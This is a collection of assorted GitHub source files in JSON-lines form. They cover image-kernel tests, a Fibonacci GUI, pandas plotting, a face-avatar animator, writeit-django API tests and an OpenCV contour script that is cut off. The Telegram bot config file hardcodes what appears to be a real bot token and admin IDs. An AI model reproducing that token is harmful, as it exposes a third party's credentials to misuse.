self._k.get_compile_log()\n if len(log) != 0:\n print('\\n'.join(log))\n\n source_surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, 320, 240)\n cr = cairo.Context(source_surface)\n cr.set_source_rgba(0,0,1,1)\n cr.paint()\n\n cr.set_source_rgba(1,0,0,1)\n cr.move_to(0,0)\n cr.line_to(160,0)\n cr.line_to(160,240)\n cr.line_to(0,240)\n cr.line_to(0,0)\n cr.fill()\n\n # Source has 160x240 == 38400 red pixels\n\n cr.set_source_rgba(0,1,0,1)\n cr.move_to(180,10)\n cr.line_to(200,10)\n cr.line_to(200,20)\n cr.line_to(180,20)\n cr.line_to(180,10)\n cr.fill()\n\n # Source has 20x10 == 200 green pixels\n\n s = CairoSurfaceSampler()\n s.set_cairo_surface(source_surface)\n self._k['src'] = s\n\n def tearDown(self):\n self._k = None\n\n def testDebug(self):\n #print(debug_dump_kernel_function(self._k))\n self.assertNotEqual(debug_dump_kernel_function(self._k), None)\n\n def testValidity(self):\n self.assertEqual(self._k.is_valid(), True)\n\n def testTarget(self):\n self.assertEqual(self._k.get_target(), KERNEL_TARGET_REDUCE)\n\n def testCompileStatusMethod(self):\n self.assertEqual(self._k.get_compile_status(), True)\n\n def testCompileStatusProperty(self):\n self.assertEqual(self._k.get_property('compile-status'), True)\n\n def testCompileLog(self):\n log = self._k.get_compile_log()\n if len(log) != 0:\n print('\\n'.join(log))\n self.assertNotEqual(log, None)\n self.assertEqual(len(log), 0)\n\n def testEngine(self):\n engine = CpuReduceEngine()\n self.assertEqual(engine.get_kernel(), None)\n engine.set_kernel(self._k)\n self.assertEqual(engine.get_kernel(), self._k)\n\n def testReduce(self):\n engine = CpuReduceEngine()\n self.assertEqual(engine.get_kernel(), None)\n engine.set_kernel(self._k)\n self.assertEqual(engine.get_kernel(), self._k)\n output = engine.run((0,0,320,240),320,240)\n self.assertEqual(len(output), 38600)\n self.assertEqual(len(filter(lambda v: v[2] == 1, output)), 38400)\n self.assertEqual(len(filter(lambda v: v[2] == 2, output)), 200)\n self.assertEqual(len(filter(lambda v: (v[2] == 1) and (v[0] <= 160), output)), 38400)\n self.assertEqual(len(filter(lambda v: (v[2] == 1) and (v[0] > 160), output)), 0)\n self.assertEqual(len(filter(lambda v: (v[2] == 2) and (v[0] <= 200), output)), 200)\n self.assertEqual(len(filter(lambda v: (v[2] == 2) and (v[0] > 200), output)), 0)\n self.assertEqual(len(filter(lambda v: (v[2] == 2) and (v[1] <= 20), output)), 200)\n self.assertEqual(len(filter(lambda v: (v[2] == 2) and (v[1] > 20), output)), 0)\n self.assertEqual(len(filter(lambda v: (v[2] == 2) and (v[1] < 10), output)), 0)\n \n def testReduceAsm(self):\n engine = CpuReduceEngine()\n self.assertEqual(engine.get_kernel(), None)\n engine.set_kernel(self._k)\n self.assertEqual(engine.get_kernel(), self._k)\n asm = debug_dump_cpu_reduce_engine_asm(engine)\n self.assertNotEqual(asm, None)\n # print(asm)\n\n# vim:sw=4:ts=4:et:autoindent\n\n","repo_name":"rjw57/firtree","sub_path":"testing/core/reduce.py","file_name":"reduce.py","file_ext":"py","file_size_in_byte":3913,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"67"} +{"seq_id":"44289799828","text":"def translate_test():\n check = []\n input_string = input(\"Please input what you want to translate into english here, in lower case.\")\n English_dic = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't',\n 'u', 'v', 'w', 'x', 'y', 'z', ' ']\n trans = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',\n 'w', 'x', 'y', 'z', ' ']\n letter = list(input_string)\n print(letter)\n for i in letter:\n id = trans.index(i)\n translated = English_dic[id]\n check.append(translated)\n print(''.join(check))\ntranslate_test()","repo_name":"Chigzzer/Home_project_1","sub_path":"translater_test.py","file_name":"translater_test.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"26926175388","text":"from tkinter import *\r\nroot = Tk()\r\nroot.title(\"Fibonacci\")\r\nroot.geometry(\"400x400\")\r\n\r\nlabel_series = Label(root, text = \"Fibonacci Series \")\r\nenter = Entry(root)\r\nlabel_sum = Label(root)\r\n\r\ndef Fibonacci():\r\n num = int(enter.get())\r\n fn = 0\r\n sn = 1\r\n sum = 0\r\n counter = 1\r\n while(counter <= num):\r\n label_series[\"text\"]+=str(sum)+\" \"\r\n counter = counter+1\r\n fn = sn\r\n sn = sum\r\n sum = fn+sn\r\n\r\n label_sum[\"text\"]=\"The sum is \"+str(sum)\r\n \r\nbtn = Button(root, text = \"Show Fibonacci Series\", command = Fibonacci)\r\n\r\nenter.pack()\r\nbtn.pack()\r\nlabel_series.pack()\r\nlabel_sum.pack()\r\n\r\nroot.mainloop()","repo_name":"TirthM89/Fibonacci_Sum","sub_path":"Fibonacci Sum.py","file_name":"Fibonacci Sum.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"38324490874","text":"#\n# Probabilistic reasoning for sequential data: Operator\n#\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom io import BytesIO\nfrom base64 import b64encode\nfrom ai_utils import read_data \n\n# Input filename\ninput_file = 'data/ai_ch11/data_2D.txt'\n\n# Load data\nx1 = read_data(input_file, 2)\nx2 = read_data(input_file, 3)\n\n# Create pandas dataframe for slicing\ndata = pd.DataFrame({'dim1': x1, 'dim2': x2})\n\n# Plot data\nstart = '1968'\nend = '1975'\ndata[start:end].plot()\nplt.title('Data overlapped on top of each other')\n\nimg = BytesIO()\nplt.savefig(img, dpi=300)\nplt.close()\nimg.seek(0)\n \nai11_plot_url1 = b64encode(img.getvalue()).decode('ascii')\n\n# Filtering using conditions\n# - 'dim1' is smaller than a certain threshold\n# - 'dim2' is greater than a certain threshold\ndata[(data['dim1'] < 45) & (data['dim2'] > 30)].plot()\nplt.title('dim1 < 45 and dim2 > 30')\n\nimg = BytesIO()\nplt.savefig(img, dpi=300)\nplt.close()\nimg.seek(0)\n \nai11_plot_url2 = b64encode(img.getvalue()).decode('ascii')\n\n# Adding two dataframes \nplt.figure()\ndiff = data[start:end]['dim1'] + data[start:end]['dim2']\ndiff.plot()\nplt.title('Summation (dim1 + dim2)')\n\n#plt.show()\nimg = BytesIO()\nplt.savefig(img, dpi=300)\nplt.close()\nimg.seek(0)\n \nai11_plot_url3 = b64encode(img.getvalue()).decode('ascii')","repo_name":"ybbobasorde/ProjectX","sub_path":"src/Chapter00/ai_ch11/ai_ch11_3.py","file_name":"ai_ch11_3.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41058257099","text":"from plugins.check_db import get_user_ids, check_db_exist\n# CONFIG\nTELE_BOT_TOKEN = '662294408:AAEONHwx_zxR0PzFhmjqV0vYbLFxH5j2nIo'\nDB_NAME = 'lapotshop.sqlite'\nDEEP_LOGGING = False # FOR DEBUGGING PURPOSES ONLY\nPROXY_CONNECTION = False # ВКЛЮЧАЕТ СОЕДИНЕНИЕ С СЕРВЕРАМИ ТЕЛЕГИ ЧЕРЕЗ ПРОКСИ\nADMIN_IDS = (401814822, 0) # BOT's ADMINS\ncheck_db_exist()\nUSER_IDS = get_user_ids()\n\n# END OF CONFIG\n","repo_name":"AntonSmirnov2/Telegram_bot_lapotShop","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"23714186338","text":"# blendshapes.py\n#\n# animate the bones of the 'Facegltf/sampledata.gltf' GLTF model\n# bone names came from inspecting scene.gltf\n# assumes the model 'izzy' already exists in ARENA scene 'cesium'\n\nimport arena\nimport random\nimport time\nimport signal\nimport json\nimport numpy as np\nfrom scipy.spatial import distance\nfrom scipy.spatial.transform import Rotation as R\n\nHOST = \"oz.andrew.cmu.edu\"\nSCENE = \"face-agr\"\nOBJECT = \"face-agr-model\"\n\nEYE_THRES = 0.16\nMOUTH_THRES = 0.25\n\nlast_face_state = { 'jawOpen': 0.0, 'eyeBlink_L':0.0, 'eyeBlink_R':0.0, 'browOuterUp_L':0.0, 'browOuterUp_R':0.0,'rotation':[1.0,1.0,1.0,1.0] }\n\nanims = [\n \"shapes.browInnerUp\",\n \"shapes.browDown_L\",\n \"shapes.browDown_R\",\n \"shapes.browOuterUp_L\",\n \"shapes.browOuterUp_R\",\n \"shapes.eyeLookUp_L\",\n \"shapes.eyeLookUp_R\",\n \"shapes.eyeLookDown_L\",\n \"shapes.eyeLookDown_R\",\n \"shapes.eyeLookIn_L\",\n \"shapes.eyeLookIn_R\",\n \"shapes.eyeLookOut_L\",\n \"shapes.eyeLookOut_R\",\n \"shapes.eyeBlink_L\",\n \"shapes.eyeBlink_R\",\n \"shapes.eyeSquint_L\",\n \"shapes.eyeSquint_R\",\n \"shapes.eyeWide_L\",\n \"shapes.eyeWide_R\",\n \"shapes.cheekPuff\",\n \"shapes.cheekSquint_L\",\n \"shapes.cheekSquint_R\",\n \"shapes.noseSneer_L\",\n \"shapes.noseSneer_R\",\n \"shapes.jawOpen\",\n \"shapes.jawForward\",\n \"shapes.jawLeft\",\n \"shapes.jawRight\",\n \"shapes.mouthFunnel\",\n \"shapes.mouthPucker\",\n \"shapes.mouthLeft\",\n \"shapes.mouthRight\",\n \"shapes.mouthRollUpper\",\n \"shapes.mouthRollLower\",\n \"shapes.mouthShrugUpper\",\n \"shapes.mouthShrugLower\",\n \"shapes.mouthClose\",\n \"shapes.mouthSmile_L\",\n \"shapes.mouthSmile_R\",\n \"shapes.mouthFrown_L\",\n \"shapes.mouthFrown_R\",\n \"shapes.mouthDimple_L\",\n \"shapes.mouthDimple_R\",\n \"shapes.mouthUpperUp_L\",\n \"shapes.mouthUpperUp_R\",\n \"shapes.mouthLowerDown_L\",\n \"shapes.mouthLowerDown_R\",\n \"shapes.mouthPress_L\",\n \"shapes.mouthPress_R\",\n \"shapes.mouthStretch_L\",\n \"shapes.mouthStretch_R\",\n \"tongue_out\"\n]\n\nclass Face(object):\n def __init__(self, msg_json):\n self.counter = 0\n self.update(msg_json)\n\n def update(self, msg_json):\n self.counter += 1\n\n self.srcWidth = msg_json[\"image\"][\"width\"]\n self.srcHeight = msg_json[\"image\"][\"height\"]\n\n self.rot = msg_json[\"pose\"][\"quaternions\"]\n self.trans = msg_json[\"pose\"][\"translation\"]\n\n self.bbox = np.array(msg_json[\"bbox\"]).reshape((2,-1))\n\n self.landmarksRaw = np.array(msg_json[\"landmarks\"]) # [x1, y1, x2, y2...]\n self.landmarks = self.landmarksRaw.reshape((-1,2)) # [[x1,y1],[x2,y2]...]\n self.landmarks = self.unrotateLandmarks(self.landmarks, self.rot)\n self.com = np.mean(self.landmarks, axis=0) # \"center of mass\" of face\n self.landmarks = self.normalizeToCOM(self.landmarks, self.com)\n\n def unrotateLandmarks(self, landmarks, rot):\n homoPts = np.vstack([landmarks.T, np.ones(len(landmarks))])\n transformed = (np.linalg.inv(R.from_quat(rot).as_matrix()) @ homoPts)\n unrot = transformed / transformed[-1]\n return unrot[:-1].T\n\n def normalizeToCOM(self, landmarks, com):\n return (landmarks - com) / (np.max(landmarks, axis=0)-np.min(landmarks, axis=0))\n\n def mouthAspect(self):\n height1 = distance.euclidean(self.lipInnerPts[1], self.lipInnerPts[7])\n height2 = distance.euclidean(self.lipInnerPts[2], self.lipInnerPts[6])\n height3 = distance.euclidean(self.lipInnerPts[3], self.lipInnerPts[5])\n width = distance.euclidean(self.lipInnerPts[0], self.lipInnerPts[4])\n return ((height1 + height2 + height3) / 3) / width\n\n def eyeAspect(self, eyePts):\n height1 = distance.euclidean(eyePts[1], eyePts[5])\n height2 = distance.euclidean(eyePts[2], eyePts[4])\n width = distance.euclidean(eyePts[0], eyePts[3])\n return ((height1 + height2) / 2) / width\n\n def create_line(self, pts1, pts2, name):\n x1 = pts1[0]\n y1 = pts1[1] + 2\n x2 = pts2[0]\n y2 = pts2[1] + 2\n\n line = arena.Line(\n (x1,y1,-0.5),\n (x2,y2,-0.5),\n 2,\n \"#ffffff\"\n )\n arena.Object(\n objName=name,\n objType=arena.Shape.line,\n line=line,\n persist=False\n )\n\n def drawLandmarks(self):\n arena.Object(\n objName=\"origin\",\n objType=arena.Shape.sphere,\n scale=(0.01,0.01,0.01),\n location=(0,2,-0.5),\n persist=False\n )\n for i in range(0, len(self.jawPts)-1):\n self.create_line(self.jawPts[i], self.jawPts[i+1], \"jaw\"+str(i))\n for i in range(0, len(self.eyebrowLPts)-1):\n self.create_line(self.eyebrowLPts[i], self.eyebrowLPts[i+1], \"browL\"+str(i))\n for i in range(0, len(self.eyebrowRPts)-1):\n self.create_line(self.eyebrowRPts[i], self.eyebrowRPts[i+1], \"browR\"+str(i))\n for i in range(0, len(self.noseBridgePts)-1):\n self.create_line(self.noseBridgePts[i], self.noseBridgePts[i+1], \"noseB\"+str(i))\n for i in range(0, len(self.noseLowerPts)-1):\n self.create_line(self.noseLowerPts[i], self.noseLowerPts[i+1], \"noseL\"+str(i))\n self.create_line(self.noseLowerPts[0], self.noseLowerPts[-1], \"noseL\"+str(i+1))\n for i in range(0, len(self.eyeLPts)-1):\n self.create_line(self.eyeLPts[i], self.eyeLPts[i+1], \"eyeL\"+str(i))\n self.create_line(self.eyeLPts[0], self.eyeLPts[-1], \"eyeL\"+str(i+1))\n for i in range(0, len(self.eyeRPts)-1):\n self.create_line(self.eyeRPts[i], self.eyeRPts[i+1], \"eyeR\"+str(i))\n self.create_line(self.eyeRPts[0], self.eyeRPts[-1], \"eyeR\"+str(i+1))\n for i in range(0, len(self.lipOuterPts)-1):\n self.create_line(self.lipOuterPts[i], self.lipOuterPts[i+1], \"lipO\"+str(i))\n self.create_line(self.lipOuterPts[0], self.lipOuterPts[-1], \"lipO\"+str(i+1))\n for i in range(0, len(self.lipInnerPts)-1):\n self.create_line(self.lipInnerPts[i], self.lipInnerPts[i+1], \"lipI\"+str(i))\n self.create_line(self.lipInnerPts[0], self.lipInnerPts[-1], \"lipI\"+str(i+1))\n\n @property\n def faceWidth(self):\n # Grab some point to normalize face with distance\n # Not sure if width of face is good?\n return distance.euclidean(self.jawPts[0],self.jawPts[-1])\n\n @property\n def blinkAmount(self):\n return (self.eyeAspect(self.eyeRPts) + self.eyeAspect(self.eyeLPts)) / 2\n\n @property\n def jawPts(self):\n return self.landmarks[0:17]\n\n @property\n def eyebrowLPts(self):\n return self.landmarks[17:22]\n\n @property\n def eyebrowRPts(self):\n return self.landmarks[22:27]\n\n @property\n def noseBridgePts(self):\n return self.landmarks[27:31]\n\n @property\n def noseLowerPts(self):\n return self.landmarks[30:36] # both parts of nose are connected, so index is 30:36 and not 31:36\n\n @property\n def eyeLPts(self):\n return self.landmarks[36:42]\n\n @property\n def eyeRPts(self):\n return self.landmarks[42:48]\n\n @property\n def lipOuterPts(self):\n return self.landmarks[48:60]\n\n @property\n def lipInnerPts(self):\n return self.landmarks[60:68]\n\n\nface = None\n\ndef callback(msg):\n global face, last_face_state\n msg_json = json.loads(msg)\n if \"hasFace\" in msg_json and msg_json[\"hasFace\"]:\n if face is None:\n face = Face(msg_json)\n else:\n face.update(msg_json)\n\n # face.drawLandmarks()\n\n # Outer Brow is set as a normalized scaler compared to face width\n browOuterUp_L = distance.euclidean(face.landmarks[19],face.landmarks[37])\n browOuterUp_R = distance.euclidean(face.landmarks[44],face.landmarks[24])\n # print( \"Raw Brow Left:\" , browOuterUp_L )\n # print( \"Raw Brow Right:\" , browOuterUp_R )\n\n browOuterScalar = 10.0\n browOuterUp_L -= 0.04\n browOuterUp_R -= 0.04\n\n browOuterUp_L = (browOuterUp_L/face.faceWidth) * browOuterScalar\n browOuterUp_R = (browOuterUp_R/face.faceWidth) * browOuterScalar\n\n if browOuterUp_L < 0:\n browOuterUp_L = 0\n if browOuterUp_R < 0:\n browOuterUp_R = 0\n\n if abs(last_face_state['browOuterUp_L']-browOuterUp_L) < 0.3:\n browOuterUp_L = last_face_state['browOuterUp_L']\n last_face_state['browOuterUp_L'] = browOuterUp_L\n\n if abs(last_face_state['browOuterUp_R']-browOuterUp_R) < 0.3:\n browOuterUp_R = last_face_state['browOuterUp_R']\n last_face_state['browOuterUp_R'] = browOuterUp_R\n\n # print( \"Brow Left:\" , browOuterUp_L )\n # print( \"Brow Right:\" , browOuterUp_R )\n\n # Mouth is set as a normalized scaler compared to face width\n mouthRight = distance.euclidean(face.landmarks[63],face.landmarks[65])\n mouthLeft = distance.euclidean(face.landmarks[61],face.landmarks[67])\n mouthPucker = distance.euclidean(face.landmarks[48],face.landmarks[54])\n\n mouthScalar = 5.0\n mouthThresh = 0.2\n\n mouthRight = (mouthRight/face.faceWidth) * mouthScalar\n mouthLeft = (mouthLeft/face.faceWidth) * mouthScalar\n mouthPucker = (mouthPucker/face.faceWidth)\n # print( \"RawPucker: \", mouthPucker )\n mouthPucker -= 0.35 # remove DC offset\n if mouthPucker < 0.0:\n mouthPucker = 0.0\n mouthPucker *= 2\n mouthPucker = 1.0 - mouthPucker # Invert it\n mouthPucker = 0.0\n # print( \"MouthPucker: \", mouthPucker )\n\n openness = face.mouthAspect()\n if openness < MOUTH_THRES: openness = 0.0\n\n # print(face.blinkAmount)\n blink = int(face.blinkAmount < EYE_THRES)\n\n morphStr = '{ \"gltf-morph\": {\"morphtarget\": \"shapes.jawOpen\", \"value\": \"' + str(openness) + '\" },'\n # morphStr = '{ \"gltf-morph\": {\"morphtarget\": \"shapes.mouthUpperUp_L\", \"value\": \"' + str(mouthLeft) + '\" },'\n # morphStr += '\"gltf-morph__2\": {\"morphtarget\": \"shapes.mouthUpperUp_R\", \"value\": \"' + str(mouthRight) + '\" },'\n # morphStr += '\"gltf-morph__3\": {\"morphtarget\": \"shapes.mouthLowerDown_L\", \"value\": \"' + str(mouthLeft) + '\" },'\n # morphStr += '\"gltf-morph__4\": {\"morphtarget\": \"shapes.mouthLowerDown_R\", \"value\": \"' + str(mouthRight) + '\" },'\n morphStr += '\"gltf-morph__5\": {\"morphtarget\": \"shapes.eyeBlink_L\", \"value\": \"' + str(blink) + '\" },'\n morphStr += '\"gltf-morph__6\": {\"morphtarget\": \"shapes.eyeBlink_R\", \"value\": \"' + str(blink) + '\" },'\n morphStr += '\"gltf-morph__7\": {\"morphtarget\": \"shapes.browOuterUp_L\", \"value\": \"' + str(browOuterUp_L) + '\" },'\n morphStr += '\"gltf-morph__8\": {\"morphtarget\": \"shapes.browOuterUp_R\", \"value\": \"' + str(browOuterUp_R) + '\" },'\n morphStr += '\"gltf-morph__9\": {\"morphtarget\": \"shapes.mouthPucker\", \"value\": \"' + str(mouthPucker) + '\" }'\n morphStr += '}'\n\n rotChange = distance.euclidean(face.rot,last_face_state['rotation'])\n if rotChange < 0.03:\n face.rot = last_face_state['rotation']\n last_face_state['rotation'] = face.rot\n\n # print(morphStr)\n if face.counter % 2 == 0:\n obj = arena.Object(\n rotation=face.rot,\n # location=(face.trans[0]/10, face.trans[1]/10+3, (face.trans[2]+50)/10-5),\n # rotation=(0,0,0.6-openness,1), # quaternion value roughly between -.05 and .05\n objName=OBJECT,\n # url=\"models/Facegltf/sampledata.gltf\",\n objType=arena.Shape.gltf_model,\n scale=(15,15,15),\n location=(0,2,-5),\n data=morphStr\n )\n\n\narena.init(HOST, \"realm\", SCENE, callback=callback)\narena.handle_events()\n","repo_name":"mwfarb/ARENA-py","sub_path":"tools/face-avatar/legacy/blendshape-head-animator.py","file_name":"blendshape-head-animator.py","file_ext":"py","file_size_in_byte":11846,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"67"} +{"seq_id":"42871500093","text":"import matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport numpy as np\n\n# reload a module in python3\n#\n# import imp\n# imp.reload(mnist_image)\n\n\ndef show(dataset, index):\n img = dataset.images[index]\n print('digit: %d' % unvectorized_result(dataset.labels[index]))\n m = np.reshape(dataset.images[index], (28, 28))\n plt.imshow(m)\n plt.show()\n\n\ndef unvectorized_result(vec):\n print(vec)\n if np.ndarray == type(vec):\n for x in range(0, len(vec)):\n if vec[x] == 1:\n return x\n else:\n return vec\n","repo_name":"taot/playground","sub_path":"tensorflow/mnist/mnist_image.py","file_name":"mnist_image.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"36850777062","text":"# coding=utf-8\nfrom django.test import TestCase\nfrom writeit.models import WriteItApiInstance, WriteItInstance, Message, Answer\nfrom django.db import IntegrityError\nfrom unittest import skip\nimport slumber\nfrom django.conf import settings\nfrom datetime import datetime\nfrom unittest import skip\nfrom popolo.models import Person\nfrom writeit.apikey_auth import ApiKeyAuth\nimport re\nfrom django.contrib.sites.models import Site\n\n\nclass WriteItApiInstanceTestCase(TestCase):\n def setUp(self):\n self.api_instance = WriteItApiInstance(url=settings.LOCAL_TESTING_WRITEIT)\n\n def test_create_instance(self):\n self.assertTrue(self.api_instance)\n self.assertEquals(self.api_instance.url, settings.LOCAL_TESTING_WRITEIT)\n\n def test_instances_are_unique(self):\n self.api_instance.save()\n instance2 = WriteItApiInstance(url= self.api_instance.url)\n with self.assertRaises(IntegrityError):\n instance2.save()\n\n def test_instance_returns_an_slumber_api(self):\n api = self.api_instance.get_api()\n self.assertTrue(isinstance(api, slumber.API) )\n\n def test_instance_api_with_auth(self):\n api = self.api_instance.get_api()\n auth = api._store['session'].auth\n self.assertTrue(isinstance(auth, ApiKeyAuth))\n self.assertEquals(auth.username, settings.WRITEIT_USERNAME)\n self.assertEquals(auth.api_key, settings.WRITEIT_KEY)\n\nfrom mock import patch\nfrom fixtures import instances\n\n\nclass WriteItInstanceTestCase(TestCase):\n def setUp(self):\n self.api_instance = WriteItApiInstance(url= settings.LOCAL_TESTING_WRITEIT)\n self.api_instance.save()\n\n def test_writeit_instance_creation(self):\n writeitinstance = WriteItInstance.objects.create(api_instance = self.api_instance,\n name='the name of the thing',\n url=\"/api/v1/instance/1/\",\n remote_id=1\n )\n self.assertTrue(writeitinstance)\n self.assertEquals(writeitinstance.api_instance, self.api_instance)\n self.assertEquals(writeitinstance.name, 'the name of the thing')\n self.assertEquals(writeitinstance.url, \"/api/v1/instance/1/\")\n self.assertEquals(writeitinstance.remote_id, 1)\n\n\n def test_unicode(self):\n writeitinstance = WriteItInstance.objects.create(api_instance = self.api_instance,\n name='the name of the thing',\n url=\"/api/v1/instance/1/\",\n remote_id=1\n )\n self.assertEquals(writeitinstance.__unicode__(), 'the name of the thing at http://127.0.0.1.xip.io:3001/api/v1')\n\n\n def test_retrieve_all2(self):\n self.api_instance.get_all()\n\n post_retrieve_instances = WriteItInstance.objects.all()\n self.assertTrue(post_retrieve_instances.count())\n self.assertEquals(post_retrieve_instances[0].remote_id, 1)\n self.assertEquals(post_retrieve_instances[1].remote_id, 2)\n self.assertEquals(post_retrieve_instances[0].name, \"instance 1\")\n \n self.assertEquals(post_retrieve_instances[1].name, \"instance 2\")\n\n self.assertEquals(post_retrieve_instances[0].url, \"/api/v1/instance/1/\")\n self.assertEquals(post_retrieve_instances[1].url, \"/api/v1/instance/2/\")\n self.assertEquals(post_retrieve_instances[0].api_instance, self.api_instance)\n self.assertEquals(post_retrieve_instances[1].api_instance, self.api_instance)\n\n # @skip(\"Not yet creating an instance\")\n def test_I_can_post_a_writeit_instance(self):\n api_instance, created = WriteItApiInstance.objects.get_or_create(url= settings.LOCAL_TESTING_WRITEIT)\n writeitinstance = WriteItInstance.objects.create(api_instance = api_instance, name='the name of the thing')\n writeitinstance.push_to_the_api()\n self.assertTrue(writeitinstance.url)\n self.assertTrue(writeitinstance.remote_id)\n self.assertEquals(writeitinstance.url, u'/api/v1/instance/%s/' % writeitinstance.remote_id)\n\n\n api = api_instance.get_api()\n response = api.instance(writeitinstance.remote_id).get()\n # writeit returns this when \n # getting http://localhost:2425/api/v1/instance/2/?format=json&username=admin&api_key=a\n # {\n # id: 2,\n # messages_uri: \"/api/v1/instance/2/messages/\",\n # moderation_needed_in_all_messages: false,\n # name: \"instance 2\",\n # rate_limiter: 0,\n # resource_uri: \"/api/v1/instance/2/\",\n # slug: \"instance2\"\n # }\n self.assertEquals(response['name'], writeitinstance.name)\n\n @skip('Not using popit')\n def test_I_can_post_a_writeit_instance_with_a_popit_api(self):\n\n popit_load_data()\n\n\n api_instance = WriteItApiInstance.objects.create(url= settings.LOCAL_TESTING_WRITEIT)\n writeitinstance = WriteItInstance.objects.create(api_instance = api_instance, name='the name of the thing')\n writeitinstance.push_to_the_api(extra_params={\n 'popit-api': settings.TEST_POPIT_API_URL\n })\n self.assertTrue(writeitinstance.url)\n self.assertTrue(writeitinstance.remote_id)\n api = api_instance.get_api()\n response = api.instance(writeitinstance.remote_id).get()\n self.assertEquals(response['name'], writeitinstance.name)\n self.assertEquals(len(response['persons']), 2)\n \n\n popit_instance = PopitApiInstance.objects.create(url= settings.TEST_POPIT_API_URL)\n popit_instance.fetch_all_from_api()\n persons = Person.objects.filter(api_instance=popit_instance)\n fiera = Person.objects.get(name=\"Fiera Feroz\")\n raton = Person.objects.get(name=\"Ratón Inteligente\")\n #Checking that Fiera and Ratón are in the persons array\n self.assertIn(raton.popit_url, response['persons'])\n self.assertIn(fiera.popit_url, response['persons'])\n\n\nclass MessageTestCase(TestCase):\n def setUp(self):\n self.api_instance = WriteItApiInstance(url=settings.LOCAL_TESTING_WRITEIT)\n self.api_instance.save()\n self.writeitinstance = WriteItInstance.objects.create(api_instance = self.api_instance,\n name='the name of the thing',\n url=\"/api/v1/instance/1/\"\n )\n self.person1 = Person.objects.create(\n name= \"Felipe\",\n )\n\n\n def test_message_instanciate(self):\n message = Message.objects.create(api_instance=self.api_instance\n , author_name='author'\n , author_email='author email'\n , subject = 'subject'\n , content = 'content'\n , writeitinstance = self.writeitinstance\n , slug='subject-slugified'\n )\n message.people.add(self.person1)\n\n self.assertTrue(message)\n self.assertEquals(message.api_instance, self.api_instance)\n self.assertEquals(message.author_name, 'author')\n self.assertEquals(message.author_email, 'author email')\n self.assertEquals(message.subject, 'subject')\n self.assertEquals(message.content, 'content')\n self.assertEquals(message.writeitinstance, self.writeitinstance)\n self.assertEquals(message.slug, 'subject-slugified')\n self.assertEquals(message.people.all().count(), 1)\n self.assertEquals(message.people.all()[0], self.person1)\n\n\nclass MessageRemoteGetterTestCase(TestCase):\n def setUp(self):\n site = Site.objects.get(id=settings.SITE_ID)\n site.domain = 'localhost:8000'\n site.name = 'localhost:8000'\n site.save()\n self.api_instance = WriteItApiInstance(url= settings.LOCAL_TESTING_WRITEIT)\n self.api_instance.save()\n self.writeitinstance = WriteItInstance.objects.create(api_instance=self.api_instance,\n name='the name of the thing',\n url=\"/api/v1/instance/1/\"\n )\n self.person1 = Person.objects.create(\n name=\"Felipe\",\n )\n\n def test_when_posting_to_the_api_writeit_message_gets_a_remote_uri(self):\n message = Message.objects.create(api_instance=self.api_instance\n , author_name='author'\n , author_email='falvarez@votainteligente.cl'\n , subject = 'subject'\n , content = 'content'\n , writeitinstance = self.writeitinstance\n )\n message.people.add(self.person1)\n message.push_to_the_api()\n\n #Now I must be sure that message has a remote_uri,\n #that is reachable and that it contains what it is expected\n\n match_id = re.match(r'^/api/v1/message/(?P\\d+)/?', message.url)\n\n self.assertIsNotNone(match_id)\n\n def test_when_I_fetch_an_instance_it_brings_all_its_messages_as_well(self):\n self.writeitinstance.fetch_messages(1)\n\n created_messages = Message.objects.all()\n\n self.assertTrue(created_messages.count())\n self.assertTrue(created_messages[0].author_email)\n self.assertTrue(created_messages[0].remote_id)\n self.assertTrue(created_messages[0].author_name)\n\n def test_get_all_messages_with_answers(self):\n self.writeitinstance.fetch_messages(1)\n\n answers = Answer.objects.all()\n self.assertTrue(answers.count())\n self.assertEquals(answers[0].content, \"Public Answer\")\n self.assertEquals(answers[0].remote_id, 1)\n\n","repo_name":"ciudadanointeligente/writeit-django","sub_path":"writeit/tests/writeit_instances_tests.py","file_name":"writeit_instances_tests.py","file_ext":"py","file_size_in_byte":9513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"3713923362","text":"import cv2\r\nimport numpy as np\r\n\r\ndef getContours(img):\r\n contours, hierarchy= cv2.findContours(img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\r\n for cnt in contours:\r\n area=cv2.contourArea(cnt)\r\n print(area)\r\n if area>0:\r\n cv2.drawContours(imgContour, cnt, -1, (0, 0, 255),1)\r\n perimeter=cv2.arcLength(cnt,True)\r\n print(perimeter)\r\n approx=cv2.approxPolyDP(cnt,0.02*perimeter,True)\r\n print(len(approx))\r\n objCorners=len(approx)\r\n x,y,width,height=cv2.boundingRect(approx)\r\n\r\n if objCorners==3:\r\n objectType='Triangle'\r\n elif objCorners==4:\r\n if(width!=height):\r\n objectType='Rectangle'\r\n else:\r\n objectType='Square'\r\n elif objCorners>10:\r\n objectType='Heart'\r\n else:\r\n objectType='Circle'\r\n\r\n\r\n cv2.rectangle(imgContour, (x, y), (x + width, y + height), (0, 255, 0), 2)\r\n cv2.putText(imgContour,objectType,(x+(width//2)-10,y+(height//2)-10),cv2.FONT_HERSHEY_SIMPLEX,0.5,(0,0,0),2)\r\n\r\nimg=cv2.imread('Resources/Screenshot 